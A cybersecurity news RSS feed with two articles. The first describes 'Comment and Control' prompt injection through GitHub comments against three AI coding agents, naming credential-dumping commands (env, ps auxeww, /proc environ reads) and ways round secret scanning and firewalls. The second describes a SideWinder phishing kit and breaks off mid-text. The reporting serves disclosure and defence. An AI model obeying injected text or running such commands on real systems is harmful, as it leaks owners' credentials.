<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:media="http://search.yahoo.com/mrss/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cyber Security News</title>
	<atom:link href="https://cybersecuritynews.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://cybersecuritynews.com/</link>
	<description>World&#039;s #1 Premier Cybersecurity and Hacking News Portal</description>
	<lastBuildDate>Tue, 21 Apr 2026 08:33:47 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://cybersecuritynews.com/wp-content/uploads/2025/12/cropped-CSN-Favico-32x32.webp</url>
	<title>Cyber Security News</title>
	<link>https://cybersecuritynews.com/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">192061645</site>	<item>
		<title>Claude Code, Gemini CLI, and GitHub Copilot Vulnerable to Prompt Injection via GitHub Comments</title>
		<link>https://cybersecuritynews.com/prompt-injection-via-github-comments/</link>
		
		<dc:creator><![CDATA[Guru Baran]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 08:33:42 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Vulnerability News]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=148021</guid>

					<description><![CDATA[<p>A critical cross-vendor vulnerability class dubbed &#8220;Comment and Control&#8221; is a new category of prompt injection attacks that weaponizes GitHub pull request titles, issue bodies, and issue comments to hijack AI coding agents and steal API keys and access tokens directly from CI/CD environments. The attack name is a deliberate play on the classic Command and Control [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/prompt-injection-via-github-comments/">Claude Code, Gemini CLI, and GitHub Copilot Vulnerable to Prompt Injection via GitHub Comments</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A critical cross-vendor vulnerability class dubbed &#8220;Comment and Control&#8221; is a new category of prompt injection attacks that weaponizes GitHub pull request titles, issue bodies, and issue comments to hijack AI coding agents and steal API keys and access tokens directly from CI/CD environments.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></p>



<p>The attack name is a deliberate play on the classic <a href="https://cybersecuritynews.com/command-and-controlc2-server/" target="_blank" rel="noreferrer noopener">Command and Control (C2) framework</a> used in malware campaigns. Three widely deployed AI agents, Anthropic&#8217;s Claude Code Security Review, Google&#8217;s Gemini CLI Action, and GitHub Copilot Agent (SWE Agent), were confirmed vulnerable.</p>



<p>According to researcher Aonan Guan, the entire attack loop runs within GitHub itself: an attacker writes a malicious PR title or issue comment, the AI agent reads and processes it as trusted context, executes attacker-supplied instructions, and exfiltrates credentials back through a PR comment, issue comment, or git commit, no external server required.</p>



<figure class="wp-block-image size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqZ7gIQshsK70N-UVd9PPPU_KmT3ThSP1dyvgLrdD7b7I0hoPaVz9MJnzs_TERKSqPrr2N6uMu1T1DCMNjyg3oSuy9-K8Fq8itHoP10PLHVY-A9M61dPQiVzFpYbpEFHDLFpmrOReLkQimtvPxEp6OPIL4adoHUr8mPvGUQTfgAK_O80rMn4Ldg6SUxU44/s16000/Attack%20Pattern.webp" alt=""/><figcaption class="wp-element-caption">Attack Pattern</figcaption></figure>



<p>Unlike classic <a href="https://cybersecuritynews.com/hackers-can-use-indirect-prompt-injection-allows-adversaries/" target="_blank" rel="noreferrer noopener">indirect prompt injection</a>, which is reactive and requires a victim to explicitly ask the AI to process a document, Comment and Control is proactive: GitHub Actions workflows auto-trigger on <code>pull_request</code>, <code>issues</code>, and <code>issue_comment</code> events, meaning simply opening a PR or filing an issue can activate the agent without any victim interaction.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="finding-1-claude-code-security-review--pr-title-to"><strong>Finding 1: Claude Code Security Review — PR Title to RCE</strong></h2>



<p>In Anthropic&#8217;s Claude Code Security Review action, the PR title is directly interpolated into the agent&#8217;s prompt with zero sanitization. Because the Claude CLI is invoked without <code>--disallowed-tools</code> or <code>--allowed-tools</code> restrictions, the subprocess inherits all environment variables including <code>ANTHROPIC_API_KEY</code> and <code>GITHUB_TOKEN</code>.</p>



<p>An attacker simply opens a PR with a malicious title that breaks out of the prompt context and instructs Claude to execute <code>whoami</code>, <code>ps auxeww</code>, or <code>env</code> — returning the full credential dump as a JSON &#8220;security finding&#8221; posted to the PR comment. Rated CVSS 9.4 Critical by Anthropic (upgraded from 9.3), the bug was reported via HackerOne (#3387969) and awarded a $100 bounty.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="finding-2-gemini-cli-action--issue-comment-to-api"><strong>Finding 2: Gemini CLI Action — Issue Comment to API Key Leak</strong></h2>



<p>Google&#8217;s Gemini CLI Action includes issue titles, bodies, and comments in the agent&#8217;s prompt context under an &#8220;Additional Content&#8221; section. By injecting a fake &#8220;Trusted Content Section&#8221; immediately after it, an attacker overrides Gemini&#8217;s safety instructions, causing Gemini to post the <code>GEMINI_API_KEY</code> as a public issue comment, visible to anyone.</p>



<p>Reported to Google VRP (#1609699) by researcher Neil Fendley alongside Johns Hopkins University collaborators, the vulnerability earned a $1,337 bounty.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="finding-3-copilot-agent--three-layer-defense-bypas"><strong>Finding 3: Copilot Agent — Three-Layer Defense Bypass</strong></h2>



<p>The GitHub Copilot Agent finding is the most technically sophisticated. GitHub had implemented three runtime-level mitigations environment variable filtering, secret scanning, and network firewall — all of which were bypassed:<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></p>



<ul class="wp-block-list">
<li><strong>Env Filtering Bypass:</strong> The <code>UU()</code> function filters sensitive variables only from the child bash subprocess. Running <code>ps auxeww</code> from that subprocess reads <code>/proc/[pid]/environ</code> of the unfiltered parent Node.js process and MCP server, recovering <code>GITHUB_TOKEN</code>, <code>GITHUB_COPILOT_API_TOKEN</code>, and two additional credentials.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></li>



<li><strong>Secret Scanning Bypass:</strong> GitHub&#8217;s scanner detects <code>ghs_</code>/<code>ghu_</code> token prefixes. Base64-encoding the output before committing evades all pattern matching.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></li>



<li><strong>Firewall Bypass:</strong> The encoded credential file is exfiltrated via a standard <code>git push</code> to a PR — a whitelisted operation — making it indistinguishable from normal Copilot workflow activity.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></li>
</ul>



<p>Adding another layer of stealth, the attack payload is hidden inside an HTML comment in the issue body, invisible in GitHub&#8217;s rendered Markdown view but fully parsed by the AI agent.</p>



<p>A victim sees only an innocent visible request and unknowingly assigns the issue to Copilot. The bug was reported via HackerOne (#3544297), initially dismissed as a &#8220;known issue&#8221; but reopened after the researcher submitted reverse-engineered source code proof from Copilot&#8217;s minified <code>index.js</code>. GitHub ultimately awarded a $500 bounty.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></p>



<figure class="wp-block-image size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvMZWgOgsEO-s0_Gq7iCxqLqPOjC5FfN4CoHq6HKrzoizy3Ujd7b9bNOTmf9rAytqWWyQGLifmFULfWKeejgZ6hkNqyw_k7Pr685W9BIbHteISsu3V5jlcqgjRznjQ_EhoW1DfmTwNT7WsQCykKxBtkP_r-_3HVz36QlQn38hYRzNWjMJ5-Hsz1hUUSW7e/s16000/claude-code-api-key-leak.webp" alt=""/></figure>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th class="has-text-align-left" data-align="left">Component</th><th class="has-text-align-left" data-align="left">Injection Surface</th><th class="has-text-align-left" data-align="left">Exfiltration Channel</th><th class="has-text-align-left" data-align="left">Credentials Leaked</th><th class="has-text-align-left" data-align="left">Bounty</th></tr></thead><tbody><tr><td>Claude Code</td><td>PR title</td><td>PR comment</td><td><code>ANTHROPIC_API_KEY</code>,&nbsp;<code>GITHUB_TOKEN</code></td><td>$100</td></tr><tr><td>Gemini CLI</td><td>Issue comments</td><td>Issue comment</td><td><code>GEMINI_API_KEY</code></td><td>$1,337</td></tr><tr><td>Copilot Agent</td><td>Issue body (HTML comment)</td><td>Git commit</td><td><code>GITHUB_TOKEN</code>,&nbsp;<code>COPILOT_API_TOKEN</code>, +2 more</td><td>$500</td></tr></tbody></table></figure>



<p>All three vulnerabilities share the same architectural flaw: untrusted GitHub data flows into an AI agent that holds production secrets and unrestricted tool access in the same runtime.</p>



<p><a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener nofollow">As researchers noted</a>, this is the first public cross-vendor demonstration of a single prompt injection pattern defeating multiple major AI agents including one that had three dedicated runtime defenses in place.</p>



<p>Security experts warn the pattern extends well beyond GitHub Actions to any AI agent processing untrusted input with access to tools and secrets, including Slack bots, Jira agents, email agents, and deployment automation pipelines.</p>



<h2 class="wp-block-heading" id="recommended-mitigations"><strong>Mitigations</strong></h2>



<ul class="wp-block-list">
<li><strong>Allowlist tools, never blocklist</strong> — use <code>--allowed-tools</code> to grant only the minimum required capabilities; blocklisting (e.g., blocking <code>ps</code>) is trivially bypassed with alternatives like <code>cat /proc/*/environ</code>.<a href="https://oddguan.com/blog/comment-and-control-prompt-injection-credential-theft-claude-code-gemini-cli-github-copilot/" target="_blank" rel="noreferrer noopener"></a></li>



<li><strong>Least-privilege secrets</strong> — agents performing read-only tasks, like issue triage, should not hold <code>GITHUB_TOKEN</code> with write scope.<a href="https://letsdatascience.com/news/ai-agents-expose-github-credentials-via-prompt-injection-a5fbe85d" target="_blank" rel="noreferrer noopener"></a></li>



<li><strong>Require human approval gates</strong> before agents perform outbound actions or access credentials.<a href="https://letsdatascience.com/news/ai-agents-expose-github-credentials-via-prompt-injection-a5fbe85d" target="_blank" rel="noreferrer noopener"></a></li>



<li><strong>Audit all AI agent integrations</strong> in CI/CD pipelines and monitor Actions logs for anomalous credential-access patterns.</li>
</ul>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> for daily cybersecurity updates. <a href="https://cybersecuritynews.com/contact-us/" target="_blank" rel="noreferrer noopener nofollow">Contact us</a> to feature your stories.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/prompt-injection-via-github-comments/">Claude Code, Gemini CLI, and GitHub Copilot Vulnerable to Prompt Injection via GitHub Comments</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/Prompt-Injection-to-Credential-Theft.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">148021</post-id>	</item>
		<item>
		<title>SideWinder Uses Fake Chrome PDF Viewer and Zimbra Clone to Steal Government Webmail Credentials</title>
		<link>https://cybersecuritynews.com/sidewinder-uses-fake-chrome-pdf-viewer-and-zimbra-clone/</link>
		
		<dc:creator><![CDATA[Tushar Subhra Dutta]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 07:54:22 +0000</pubDate>
				<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Threats]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=148015</guid>

					<description><![CDATA[<p>A well-known advanced persistent threat group called SideWinder has launched a highly targeted phishing campaign against South Asian government organizations, using a fake Chrome PDF viewer and a pixel-perfect clone of the Zimbra email login portal to steal employee credentials. The campaign, active since at least February 2026, has been targeting sensitive institutions including Bangladesh [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/sidewinder-uses-fake-chrome-pdf-viewer-and-zimbra-clone/">SideWinder Uses Fake Chrome PDF Viewer and Zimbra Clone to Steal Government Webmail Credentials</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A well-known advanced persistent threat group called SideWinder has launched a highly targeted phishing campaign against South Asian government organizations, using a fake Chrome PDF viewer and a pixel-perfect clone of the Zimbra email login portal to steal employee credentials. </p>



<p>The campaign, active since at least February 2026, has been targeting sensitive institutions including Bangladesh Navy, Pakistan&#8217;s Ministry of Foreign Affairs, and several other defense and government bodies across the region.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/7411ff93-c546-427a-a993-dddee441be39/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.pdf?AWSAccessKeyId=ASIA2F3EMEYEWQOYUKKV&amp;Signature=LLG5pKCCleaPuM9hYYnCAgHJ4mk%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJIMEYCIQDFV4lOMxDyR7E4idEXLvC9UzuzPpMpeJCj31DFEPvtZgIhAIx0t2eU751goB91%2BACXK7OZc0lgYTorLrSjWflNjHXtKvMECDEQARoMNjk5NzUzMzA5NzA1Igz9cA3eNuivv8ssowgq0ATQHJ5UjxWEuhyBImGlryZsgA9ro1Aw30lVIiz%2F%2FLCDuEyGAgBu891zf9orCQf5glM%2B%2BY%2BehYQt3LlWmkrTvyNi0Q%2BJBhAweU7mAFL3NJJB%2BsXQk%2FZAhW8AaCzrILVB7pogjNNsG9heKVsnuET2vBFHJ%2BnGO6zicWSUla0z01P1z0oNwzGswgQVjHZiMNhkPJYPj%2FTAiT1rNqJ65m9%2BdZM59Dw%2B4rXoitufvfK79sziIxIwxXHJ6bOheCy7pm9kEjQnosL8qBOkDpiTt8m3ZJMRGjBthDPbD6UfMYYhh99xj9vwfI5KttnHuDBnkQp9B6JBO0PFwpcHnK8PlCHmsJ%2B%2BQadk0lL5wMKjv9vClsVsA4LK9I90hgJfwl8jBZjGSk5pyG2zInPmR%2BbJ8xd4QdlvP5eza8IxdICTnyMRhxCs55yZMzuADqiIpqjTBeXzJEPqr4Mshj9ewIPdqOO%2Bt5ZCzISJiKsPoqrrslx%2BG%2F%2Bzf8DC6YP3OBZtgLP2DzzwbDkHKXEnj71nApgdlPUbkGRbsLjIu7pw%2BHL3t9luoPkGrUSQH98Zlv9wUEwI9Gxn9si6p4zjiR3c0iQ3NdCumpdbTpYsFejpF8zXvZEyP9Z6no1vlJoEzm8PIII%2BoJBR2pgOgI1jdiYarLbMAIO%2Bqp3S3B2l8ecLUMeOQQg%2Fo8pwdgiid7xaOn0Z%2B9ype0Gt1HFPTUe4lB9Im%2BYfY33twXA0vyB1ob1mfcU1ewrMzzeffR4w%2BOEC%2FoWV1i9AQzPwT3OT3OlpBsIg5k18oTiyMkIQMMTPnM8GOpcBjKCkO4kWLUbmI8vV5SePwtMRjLzYTHcIi%2FMCj2qdTERT3LUd1bdmC%2FwZgY%2Fr6sz%2BBZqHtXittOrsJXDJfsCyp2KiYHtbh8reU8UIcJrH9jAnavvXwAX2Md98q7AoL1Xb0TXQKEICg7o2GCKrOXmhaaG%2FbQ6UpD%2BFpK%2BeTpxIiq4GoY82jOb5tAueshDVF0QWYvhOI8Zfkg%3D%3D&amp;Expires=1776757336" target="_blank" rel="noreferrer noopener"></a></p>



<p>The attack begins with a spearphishing link sent to targeted individuals. When a victim opens the link, they land on a page that looks exactly like Google Chrome&#8217;s built-in PDF viewer. </p>



<p>The <a href="https://cybersecuritynews.com/tycoon-phishing-kit-employs-new-technique/" id="124816" target="_blank" rel="noreferrer noopener">phishing kit</a>, internally named Z2FA_LTS, uses PDF.js version 2.16.105 to render this fake viewer, complete with toolbar controls for zoom, print, page navigation, and download. </p>



<p>The displayed document is a real, stolen Pakistani government diplomatic cable related to the 152nd IPU Assembly in Istanbul, but it is intentionally blurred so the victim cannot read it. After five seconds, the page automatically redirects the victim to the next stage of the attack.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/7411ff93-c546-427a-a993-dddee441be39/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.pdf?AWSAccessKeyId=ASIA2F3EMEYEWQOYUKKV&amp;Signature=LLG5pKCCleaPuM9hYYnCAgHJ4mk%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJIMEYCIQDFV4lOMxDyR7E4idEXLvC9UzuzPpMpeJCj31DFEPvtZgIhAIx0t2eU751goB91%2BACXK7OZc0lgYTorLrSjWflNjHXtKvMECDEQARoMNjk5NzUzMzA5NzA1Igz9cA3eNuivv8ssowgq0ATQHJ5UjxWEuhyBImGlryZsgA9ro1Aw30lVIiz%2F%2FLCDuEyGAgBu891zf9orCQf5glM%2B%2BY%2BehYQt3LlWmkrTvyNi0Q%2BJBhAweU7mAFL3NJJB%2BsXQk%2FZAhW8AaCzrILVB7pogjNNsG9heKVsnuET2vBFHJ%2BnGO6zicWSUla0z01P1z0oNwzGswgQVjHZiMNhkPJYPj%2FTAiT1rNqJ65m9%2BdZM59Dw%2B4rXoitufvfK79sziIxIwxXHJ6bOheCy7pm9kEjQnosL8qBOkDpiTt8m3ZJMRGjBthDPbD6UfMYYhh99xj9vwfI5KttnHuDBnkQp9B6JBO0PFwpcHnK8PlCHmsJ%2B%2BQadk0lL5wMKjv9vClsVsA4LK9I90hgJfwl8jBZjGSk5pyG2zInPmR%2BbJ8xd4QdlvP5eza8IxdICTnyMRhxCs55yZMzuADqiIpqjTBeXzJEPqr4Mshj9ewIPdqOO%2Bt5ZCzISJiKsPoqrrslx%2BG%2F%2Bzf8DC6YP3OBZtgLP2DzzwbDkHKXEnj71nApgdlPUbkGRbsLjIu7pw%2BHL3t9luoPkGrUSQH98Zlv9wUEwI9Gxn9si6p4zjiR3c0iQ3NdCumpdbTpYsFejpF8zXvZEyP9Z6no1vlJoEzm8PIII%2BoJBR2pgOgI1jdiYarLbMAIO%2Bqp3S3B2l8ecLUMeOQQg%2Fo8pwdgiid7xaOn0Z%2B9ype0Gt1HFPTUe4lB9Im%2BYfY33twXA0vyB1ob1mfcU1ewrMzzeffR4w%2BOEC%2FoWV1i9AQzPwT3OT3OlpBsIg5k18oTiyMkIQMMTPnM8GOpcBjKCkO4kWLUbmI8vV5SePwtMRjLzYTHcIi%2FMCj2qdTERT3LUd1bdmC%2FwZgY%2Fr6sz%2BBZqHtXittOrsJXDJfsCyp2KiYHtbh8reU8UIcJrH9jAnavvXwAX2Md98q7AoL1Xb0TXQKEICg7o2GCKrOXmhaaG%2FbQ6UpD%2BFpK%2BeTpxIiq4GoY82jOb5tAueshDVF0QWYvhOI8Zfkg%3D%3D&amp;Expires=1776757336" target="_blank" rel="noreferrer noopener"></a></p>



<p><a href="https://intel.breakglass.tech/post/sidewinder-z2fa-lts-moincox-bangladesh-navy-pakistan-mofa-opsec-burn" id="https://intel.breakglass.tech/post/sidewinder-z2fa-lts-moincox-bangladesh-navy-pakistan-mofa-opsec-burn" target="_blank" rel="noreferrer noopener nofollow">Breakglass Intelligence analysts identified the phishing kit</a> after researcher @volrant136 flagged a Cloudflare Workers URL hosting a Zimbra credential harvester pointing at Bangladesh Navy&#8217;s webmail portal, mail.navy.mil.bd. </p>



<p>Through URLScan analysis, researchers mapped 7 distinct phishing Workers deployed across two Cloudflare accounts over a three-month period, targeting Bangladesh Navy, Pakistan&#8217;s Ministry of Foreign Affairs, iCloud users, Nayatel, and the Bangladesh Computer Council. </p>



<p>Multiple independent researchers including @Huntio, @500mk500, @MichalKoczwara, and @malwrhunterteam confirmed the attribution to SideWinder.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/7411ff93-c546-427a-a993-dddee441be39/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.pdf?AWSAccessKeyId=ASIA2F3EMEYEWQOYUKKV&amp;Signature=LLG5pKCCleaPuM9hYYnCAgHJ4mk%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJIMEYCIQDFV4lOMxDyR7E4idEXLvC9UzuzPpMpeJCj31DFEPvtZgIhAIx0t2eU751goB91%2BACXK7OZc0lgYTorLrSjWflNjHXtKvMECDEQARoMNjk5NzUzMzA5NzA1Igz9cA3eNuivv8ssowgq0ATQHJ5UjxWEuhyBImGlryZsgA9ro1Aw30lVIiz%2F%2FLCDuEyGAgBu891zf9orCQf5glM%2B%2BY%2BehYQt3LlWmkrTvyNi0Q%2BJBhAweU7mAFL3NJJB%2BsXQk%2FZAhW8AaCzrILVB7pogjNNsG9heKVsnuET2vBFHJ%2BnGO6zicWSUla0z01P1z0oNwzGswgQVjHZiMNhkPJYPj%2FTAiT1rNqJ65m9%2BdZM59Dw%2B4rXoitufvfK79sziIxIwxXHJ6bOheCy7pm9kEjQnosL8qBOkDpiTt8m3ZJMRGjBthDPbD6UfMYYhh99xj9vwfI5KttnHuDBnkQp9B6JBO0PFwpcHnK8PlCHmsJ%2B%2BQadk0lL5wMKjv9vClsVsA4LK9I90hgJfwl8jBZjGSk5pyG2zInPmR%2BbJ8xd4QdlvP5eza8IxdICTnyMRhxCs55yZMzuADqiIpqjTBeXzJEPqr4Mshj9ewIPdqOO%2Bt5ZCzISJiKsPoqrrslx%2BG%2F%2Bzf8DC6YP3OBZtgLP2DzzwbDkHKXEnj71nApgdlPUbkGRbsLjIu7pw%2BHL3t9luoPkGrUSQH98Zlv9wUEwI9Gxn9si6p4zjiR3c0iQ3NdCumpdbTpYsFejpF8zXvZEyP9Z6no1vlJoEzm8PIII%2BoJBR2pgOgI1jdiYarLbMAIO%2Bqp3S3B2l8ecLUMeOQQg%2Fo8pwdgiid7xaOn0Z%2B9ype0Gt1HFPTUe4lB9Im%2BYfY33twXA0vyB1ob1mfcU1ewrMzzeffR4w%2BOEC%2FoWV1i9AQzPwT3OT3OlpBsIg5k18oTiyMkIQMMTPnM8GOpcBjKCkO4kWLUbmI8vV5SePwtMRjLzYTHcIi%2FMCj2qdTERT3LUd1bdmC%2FwZgY%2Fr6sz%2BBZqHtXittOrsJXDJfsCyp2KiYHtbh8reU8UIcJrH9jAnavvXwAX2Md98q7AoL1Xb0TXQKEICg7o2GCKrOXmhaaG%2FbQ6UpD%2BFpK%2BeTpxIiq4GoY82jOb5tAueshDVF0QWYvhOI8Zfkg%3D%3D&amp;Expires=1776757336" target="_blank" rel="noreferrer noopener"></a></p>



<p>One critical detail revealed during the investigation was a significant operational security failure by the kit developer. When analysts sent a POST request without the expected query parameter, the server returned a 500 error exposing a full Express.js stack trace. </p>



<p>The leaked path &#8220;/home/moincox/Z2FA_LTS/app.js&#8221; revealed the developer&#8217;s Linux username &#8220;moincox&#8221; and the internal project name Z2FA_LTS, which stands for &#8220;Zimbra 2FA Long-Term Support.&#8221; </p>



<p>The &#8220;LTS&#8221; label suggests that the developer maintains multiple version branches of this phishing kit. The developer handle moincox returned no results on GitHub, npm, or major code hosting platforms.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/7411ff93-c546-427a-a993-dddee441be39/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.pdf?AWSAccessKeyId=ASIA2F3EMEYEWQOYUKKV&amp;Signature=LLG5pKCCleaPuM9hYYnCAgHJ4mk%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJIMEYCIQDFV4lOMxDyR7E4idEXLvC9UzuzPpMpeJCj31DFEPvtZgIhAIx0t2eU751goB91%2BACXK7OZc0lgYTorLrSjWflNjHXtKvMECDEQARoMNjk5NzUzMzA5NzA1Igz9cA3eNuivv8ssowgq0ATQHJ5UjxWEuhyBImGlryZsgA9ro1Aw30lVIiz%2F%2FLCDuEyGAgBu891zf9orCQf5glM%2B%2BY%2BehYQt3LlWmkrTvyNi0Q%2BJBhAweU7mAFL3NJJB%2BsXQk%2FZAhW8AaCzrILVB7pogjNNsG9heKVsnuET2vBFHJ%2BnGO6zicWSUla0z01P1z0oNwzGswgQVjHZiMNhkPJYPj%2FTAiT1rNqJ65m9%2BdZM59Dw%2B4rXoitufvfK79sziIxIwxXHJ6bOheCy7pm9kEjQnosL8qBOkDpiTt8m3ZJMRGjBthDPbD6UfMYYhh99xj9vwfI5KttnHuDBnkQp9B6JBO0PFwpcHnK8PlCHmsJ%2B%2BQadk0lL5wMKjv9vClsVsA4LK9I90hgJfwl8jBZjGSk5pyG2zInPmR%2BbJ8xd4QdlvP5eza8IxdICTnyMRhxCs55yZMzuADqiIpqjTBeXzJEPqr4Mshj9ewIPdqOO%2Bt5ZCzISJiKsPoqrrslx%2BG%2F%2Bzf8DC6YP3OBZtgLP2DzzwbDkHKXEnj71nApgdlPUbkGRbsLjIu7pw%2BHL3t9luoPkGrUSQH98Zlv9wUEwI9Gxn9si6p4zjiR3c0iQ3NdCumpdbTpYsFejpF8zXvZEyP9Z6no1vlJoEzm8PIII%2BoJBR2pgOgI1jdiYarLbMAIO%2Bqp3S3B2l8ecLUMeOQQg%2Fo8pwdgiid7xaOn0Z%2B9ype0Gt1HFPTUe4lB9Im%2BYfY33twXA0vyB1ob1mfcU1ewrMzzeffR4w%2BOEC%2FoWV1i9AQzPwT3OT3OlpBsIg5k18oTiyMkIQMMTPnM8GOpcBjKCkO4kWLUbmI8vV5SePwtMRjLzYTHcIi%2FMCj2qdTERT3LUd1bdmC%2FwZgY%2Fr6sz%2BBZqHtXittOrsJXDJfsCyp2KiYHtbh8reU8UIcJrH9jAnavvXwAX2Md98q7AoL1Xb0TXQKEICg7o2GCKrOXmhaaG%2FbQ6UpD%2BFpK%2BeTpxIiq4GoY82jOb5tAueshDVF0QWYvhOI8Zfkg%3D%3D&amp;Expires=1776757336" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="how-the-infection-mechanism-works"><strong>How the Infection Mechanism Works</strong></h2>



<p>The Z2FA_LTS phishing kit is a server-rendered Express.js application deployed on Cloudflare Workers, and its infection chain is carefully designed to look convincing at every step. </p>



<p>After the victim sees the blurred PDF, they are redirected to a <a href="https://cybersecuritynews.com/mass-phishing-campaign-zimbra/" id="38080" target="_blank" rel="noreferrer noopener">fake Zimbra</a> loading splash screen that pulls real CSS stylesheets directly from the legitimate Bangladesh Navy mail server, making the page visually indistinguishable from the real one. </p>



<p>The victim is then sent to a Zimbra Harmony skin login clone, where all static assets including favicons and stylesheets are reverse-proxied from the real server through the phishing Worker&#8217;s &#8220;/proxy/&#8221; path.<a 